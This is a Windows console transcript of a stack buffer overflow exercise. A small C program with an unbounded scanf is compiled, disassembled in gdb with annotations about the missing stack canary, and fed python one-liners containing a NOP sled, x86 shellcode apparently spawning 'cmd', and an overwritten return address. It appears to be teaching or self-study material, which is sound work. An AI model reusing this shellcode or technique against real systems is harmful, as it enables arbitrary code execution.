C:\Users\Administrator\Desktop>cat test.c
#include<stdio.h>
/*
 * Test program: prints a banner, reads one whitespace-delimited token from
 * stdin into a 40-byte automatic buffer, echoes it back, then prints the
 * address of the argv[1] slot.
 *
 * The function is declared without a return type (implicit int) and has no
 * return statement, so the value handed back to the runtime is not defined
 * by the program itself.
 */
main(int argc, char *argv[]){
        /* Fixed-size stack array: room for at most 39 characters plus the NUL. */
        char buffer[40];
        printf("Hello world");
        /*
         * Unbounded read (stack-based buffer overflow, CWE-121): "%s" carries
         * no field width, so scanf keeps storing bytes until it meets
         * whitespace, however long the token is. Anything beyond 39 bytes is
         * written past the end of buffer into adjacent stack memory.
         * A bounded conversion such as "%39s", or
         * fgets(buffer, sizeof buffer, stdin), keeps the write inside the array.
         */
        scanf("%s",buffer);
        printf("%s\n",buffer);
        /*
         * Only the address of the argv[1] slot is taken; argv[1] itself is
         * never read. The printed value is a process address written to
         * stdout, i.e. an address disclosure; it differs between runs in the
         * surrounding session.
         * NOTE(review): %p formally expects a void * argument - a cast would
         * make that explicit.
         */
        printf("%p\n",&argv[1]);
}

C:\Users\Administrator\Desktop>(python -c "print '\x90'*16+'\x55\x8b\xec\x33\xff
\x57\xc6\x45\xfc\x63\xc6\x45\xfd\x6d\xc6\x45\xfe\x64\x57\xc6\x45\xf8\x03\x8d\x45
\xfc\x50\xb8\x3c\x73\xe7\x77\xff\xd0\x58\x5d'+'\x4c\x0f\x6e\x00'")|test.exe
Hello worldU3WE?E?E?WE?E??s??]Ln
006E0F4C

C:\Users\Administrator\Desktop>gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=c:/mingw/bin/../libexec/gcc/mingw32/4.5.2/lto-wrapper.exe
Target: mingw32
Configured with: ../gcc-4.5.2/configure --enable-languages=c,c++,ada,fortran,obj
c,obj-c++ --disable-sjlj-exceptions --with-dwarf2 --enable-shared --enable-libgo
mp --disable-win32-registry --enable-libstdcxx-debug --enable-version-specific-r
untime-libs --disable-werror --build=mingw32 --prefix=/mingw
Thread model: win32
gcc version 4.5.2 (GCC)


C:\Users\Administrator\Desktop>gdb -q test.exe
Reading symbols from C:\Users\Administrator\Desktop/test.exe...(no debugging sym
bols found)...done.
(gdb) disass main
Dump of assembler code for function main:
   # Annotated gdb disassembly of main (32-bit x86, AT&T operand order: src, dst).
   # The '#' notes are reviewer annotations, not gdb output.
   0x004013c0 <+0>:     push   %ebp                     # save caller's frame pointer
   0x004013c1 <+1>:     mov    %esp,%ebp                # establish main's frame
   0x004013c3 <+3>:     and    $0xfffffff0,%esp         # round esp down to a 16-byte boundary
   0x004013c6 <+6>:     sub    $0x40,%esp               # reserve 0x40 bytes: outgoing args + locals
   0x004013c9 <+9>:     call   0x401a40 <__main>        # runtime init hook called at the top of main
   0x004013ce <+14>:    movl   $0x403064,(%esp)         # arg0 = string constant (presumably "Hello world")
   0x004013d5 <+21>:    call   0x401cb8 <printf>
   0x004013da <+26>:    lea    0x18(%esp),%eax          # eax = &buffer; esp+0x18..esp+0x3f is the 40-byte array
   0x004013de <+30>:    mov    %eax,0x4(%esp)           # arg1 = buffer; no length accompanies it
   0x004013e2 <+34>:    movl   $0x403070,(%esp)         # arg0 = format string (presumably "%s")
   0x004013e9 <+41>:    call   0x401cc0 <scanf>         # unbounded write into buffer happens here
   0x004013ee <+46>:    lea    0x18(%esp),%eax          # eax = &buffer again
   0x004013f2 <+50>:    mov    %eax,(%esp)
   0x004013f5 <+53>:    call   0x401cb0 <puts>          # printf("%s\n", buffer) was compiled down to puts(buffer)
   0x004013fa <+58>:    mov    0xc(%ebp),%eax           # eax = argv (second stack argument of main)
   0x004013fd <+61>:    add    $0x4,%eax                # eax = &argv[1]
   0x00401400 <+64>:    mov    %eax,0x4(%esp)
   0x00401404 <+68>:    movl   $0x403073,(%esp)         # arg0 = format string (presumably "%p\n")
   0x0040140b <+75>:    call   0x401cb8 <printf>        # discloses the pointer value on stdout
   # Epilogue: the saved %ebp and the return address are taken straight from the
   # stack. No stack-protector canary is compared before 'ret' in this build, so
   # corruption of the words above buffer is not detected at return.
   0x00401410 <+80>:    leave
   0x00401411 <+81>:    ret
   # Everything below is padding after the function body, not executed code:
   # two nops, then zero bytes that the disassembler decodes as add %al,(%eax).
   0x00401412 <+82>:    nop
   0x00401413 <+83>:    nop
   0x00401414 <+84>:    add    %al,(%eax)
   0x00401416 <+86>:    add    %al,(%eax)
   0x00401418 <+88>:    add    %al,(%eax)
   0x0040141a <+90>:    add    %al,(%eax)
   0x0040141c <+92>:    add    %al,(%eax)
   0x0040141e <+94>:    add    %al,(%eax)
End of assembler dump.
(gdb) q

C:\Users\Administrator\Desktop>(python -c "print '\x90'*16+'\x55\x8b\xec\x33\xff
\x57\xc6\x45\xfc\x63\xc6\x45\xfd\x6d\xc6\x45\xfe\x64\x57\xc6\x45\xf8\x03\x8d\x45
\xfc\x50\xb8\x3c\x73\xe7\x77\xff\xd0\x58\x5d'+'\xc0\x13\x40\x00'")|test.exe
Hello worldU3WE?E?E?WE?E??s??]?@
005B0F4C
Hello worldU3WE?E?E?WE?E??s??]?]
005B1814

C:\Users\Administrator\Desktop>